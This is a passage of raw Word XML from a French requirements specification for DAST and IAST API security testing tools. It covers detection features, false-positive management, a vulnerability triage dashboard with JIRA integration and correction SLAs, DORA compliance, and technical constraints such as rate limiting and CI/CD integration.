        <w:t xml:space="preserve">Mode passif : observation du trafic reel sans envoi de payloads actifs - zero risque de perturbation en production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode actif limite : scan avec rate limiting strict sur preprod/production stabilisee</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection d'APIs non referencees : shadow, zombie, endpoints apparus hors du cycle de developpement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection du drift de configuration : ecarts entre la configuration staging et la configuration production reelle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapport asynchrone : PDF/HTML classe C2 Restreint envoye au CSIRT et RSSI apres completion du scan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Le DAST CI/CD ne remplace pas le DAST On-Demand. Le CI/CD teste un environnement ephemere isole avec des donnees fictives. Le On-Demand teste la surface reelle de production. Les deux sont complementaires et obligatoires.</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1.5   IAST — Fonctionnalites attendues</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">L'IAST instrumente l'application de l'interieur pendant les tests fonctionnels existants. Il ne necessite pas de trafic d'attaque dedie et genere structurellement moins de faux positifs que le DAST.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Avantage cle : l'IAST observe l'execution reelle. Si la vulnerabilite n'est pas declenchee pendant les tests, elle n'est pas reportee. Chaque finding correspond a un chemin d'execution reellement parcouru.</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1.5.1   Taint tracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Suivi complet du flux de donnees depuis l'entree (parametre HTTP, header, body JSON/XML, cookie) jusqu'au sink dangereux (SQL query, shell exec, file write, log output, reponse HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection des vulnerabilites confirmees par execution reelle : SQLi, XSS, SSRF, Path Traversal, XXE, Deserialisation, Command Injection, LDAP Injection, Log Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Distinction source / sanitizer / sink : detection uniquement si le flux parcourt le chemin complet sans sanitization adequate</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1.5.2   Detection des secrets et misconfigurations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Secrets en clair dans les reponses HTTP : tokens, cles API, mots de passe, IBAN, hashes exposes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection des headers de securite manquants : HSTS, X-Frame-Options, CSP, X-Content-Type-Options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mode debug active en production : stack traces exposees, messages d'erreur verbeux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Algorithmes cryptographiques faibles detectes a l'execution : MD5, SHA1, DES, RC4</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1.5.3   Gestion des faux positifs IAST</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par package : ne pas instrumenter les packages framework (org.springframework.*, com.fasterxml.*, javax.servlet.*) pour eviter les FP sur le code tiers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exclusion par sink : ne pas surveiller certains sinks non sensibles dans le contexte applicatif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Threshold de confiance : ne remonter que les findings avec confiance &gt; 80%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Declaration de sanitizers custom : si la sanitization est effectuee par une lib non instrumentee</w:t>
      </w:r>
    </w:p>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1.6   Dashboard &amp; Gestion des Vulnerabilites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le dashboard est le point d'entree quotidien des equipes securite, developpement et management. Un outil avec d'excellentes capacites de detection mais un dashboard inexploitable ne sera pas adopte.</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1.6.1   Vue consolidee multi-projets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Nombre total de vulnerabilites actives par criticite (CRITICAL / HIGH / MEDIUM / LOW) avec evolution temporelle sur 30/90 jours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Score de securite global par application (0-100, base sur la severite et l'age des vulnerabilites non corrigees) - aligne CVSS v3.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Taux de couverture des scans : % d'APIs scannees vs inventaire total, date du dernier scan par application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vue conformite DORA : APIs FCI sans scan hebdomadaire, ecarts aux RTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtrage par projet GitLab, equipe, tag (FCI / non-FCI), environnement, langage</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1.6.2   Workflow de triage des vulnerabilites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000"/>
        <w:gridCol w:w="31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 peut changer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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scans suivants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Detectee, non traitee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Automatique (scan)</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Remonte a chaque scan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Confirmed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Validee comme vuln reelle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Securite / Lead Dev</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Remonte + comptabilisee SLA</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False Positive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Requalifiee FP avec justification obligatoire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Securite UNIQUEMENT</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Supprimee des runs suivants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Accepted Risk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Risque accepte avec justification + date expiration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RSSI</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Exclue jusqu'a expiration</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Fixed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Correction deployee et verifiee par re-scan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Dev / Securite</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 remonte plus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 Progress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Correction en cours - ticket JIRA associe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Dev</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Remonte avec lien ticket</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1.6.3   Integration JIRA et ticketing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Creation de ticket JIRA directement depuis un finding en un clic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Mapping automatique des champs : titre, description, priorite (CRITICAL -&gt; P1, HIGH -&gt; P2), labels (security, DAST/IAST), composant (projet applicatif)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Lien bidirectionnel : le ticket JIRA affiche le finding, le finding affiche le statut du ticket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fermeture automatique du ticket si le finding passe en Fixed lors du re-scan</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1.6.4   Suivi des corrections et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8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Criticite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SLA de correction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Alerte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Blocage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CRITICAL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 jours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J-3 + J-depassement -&gt; RSSI + equipe securite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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 - pipeline bloque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 jours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J-7 + J-depassement -&gt; equipe securite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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Avertissement</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MEDIUM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90 jours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J-14 -&gt; lead dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2826"/>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180 jours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J-30 -&gt; dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2826"/>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1.6.5   Criticite et scoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS v3.1 : score calcule a partir du vecteur d'attaque, complexite, privileges requis, impact (C/I/A)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enrichissement contextuel : une vuln MEDIUM sur une API FCI est remontee en HIGH (facteur multiplicateur configurable)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">KEV (CISA) : flag automatique si la vuln correspond a une CVE dans le catalogue Known Exploited Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EPSS : probabilite d'exploitation dans les 30 prochains jours - affiche sur chaque finding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IAST - confiance du taint tracking : HIGH confidence (source -&gt; sink sans sanitizer) = CRITICAL ; MEDIUM confidence (sanitizer partiel) = HIGH</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1.6.6   Tableau de synthese des exigences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100"/>
        <w:gridCol w:w="2626"/>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Fonctionnalite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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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EF-D01</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Vue consolidee multi-projets avec KPI securite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Score de securite par application (CVSS-based)</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EF-D03</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Workflow triage 6 statuts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Requalification FP avec justification + approbation securite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EF-D05</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Commentaires et collaboration par finding</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EF-D06</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Integration JIRA (creation + lien bidirectionnel + fermeture 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EF-D07</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SLA de correction par criticite avec alertes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EF-D08</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Rapport differentiel (nouveaux findings uniquement)</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EF-D09</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Export conformite DORA (PDF/Excel)</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EF-D10</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Enrichissement KEV + EPSS</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26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EF-D11</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Notifications Teams/Slack/email/webhook</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EF-D12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Vue conformite RTS DORA (APIs FCI)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N/A</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EF-D13</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REST dashboard (consommable par VOC externe)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EF-D14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Alerting sur abus de requalification FP</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26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2   Exigences Techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Les exigences techniques decrivent les contraintes d'architecture, de performance et de securite. Elles repondent a la question : comment l'outil doit fonctionner et avec quelles contraintes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Contrainte environnement (DEB section 2.2) : les outils ne doivent pas provoquer de deni de service sur le perimetre des API ou etre agences de maniere incoherente avec l'affluence d'usage. Donnees classees : D:1, I:3, C:3, T:3 (DICT).</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2.1   Tableau des exigences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5200"/>
        <w:gridCol w:w="146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Domaine</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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Protocoles &amp; formats</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Support REST/JSON, SOAP/XML (obligatoire). GraphQL, gRPC, WebSocket, AsyncAPI, MQTT, AMQP (recommande). TLS 1.2 minimum, 1.3 recommande.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Multi-langages IAST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Agent IAST pour Java (JVM 8+), Python (3.8+), Node.js (16+), .NET Core (6+). Support Go et PHP recommande. Zero modification du code source.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Integration GitLab CI/CD</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Template job reutilisable via include. Stages .pre/build/test/security-scan/publish. Compatible needs + artifacts. GitLab CE Free tier.</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Token refresh mid-scan</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Renouvellement automatique des tokens OAuth2/JWT pendant le scan. Un scan de 30-60 min ne doit jamais echouer silencieusement pour cause de token expire.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resultats / exports</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REST resultats (JSON). Export SARIF, CycloneDX, HTML/PDF personnalisable, CSV. Rapport differentiel natif.</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Non-intrusivite DAST CI/CD</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Rate limiting : 20 req/s max. Timeout pipeline : 20 min strict. Jamais sur production.</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Non-intrusivite DAST On-Demand</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Rate limiting : 5 req/s max. Circuit breaker si taux erreur 5xx &gt; 5%. Plage horaire configurable. Mode passif disponible.</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Couverture OWASP API Top10:2023</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Les 10 categories couvertes. Demonstration exigee lors du benchmark.</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ET-09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Baseline FP - architecture serveur</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Serveur de gestion des FP centralise (modele CxSAST). Ancre sur hash de reponse. Expiration obligatoire (90 jours). Pas de fichier YAML libre modifiable par les developpeurs.</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Secrets management On-Demand</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Integration vault (CyberArk, HashiCorp) pour les scans prod. Variables GitLab CI/CD protegees/masquees pour les scans CI/CD.</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ET-11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Overhead IAST</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CPU &lt; 10%, memoire documentee par langage, impact latence &lt; 15%. Mesure reproductible obligatoire lors du benchmark.</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Securite du composant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Acces restreint, authentification forte, journalisation des acces. Donnees C:3. Separation des roles native (Dev / Securite / RSSI).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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ET-13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Scalabilite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Capacite de scanner plusieurs centaines d'APIs. Parallelisation des scans. Pas d'agent unique bloquant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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ET-14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Source mapping IAST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Affichage de la ligne de code exacte si source disponible. Desactive en production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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2.2   DAST CI/CD — Contraintes techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.1   Environnement et positionnement dans le pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le DAST CI/CD s'applique exclusivement aux environnements staging et integration. L'application doit etre deployee avant le demarrage du scan.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Ne jamais lancer un scan DAST actif en production : risque de DoS applicatif, pollution des donnees metier, declenchement WAF/IPS.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D1117" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="110"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="110"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">stages:</w:t>
            </w:r>
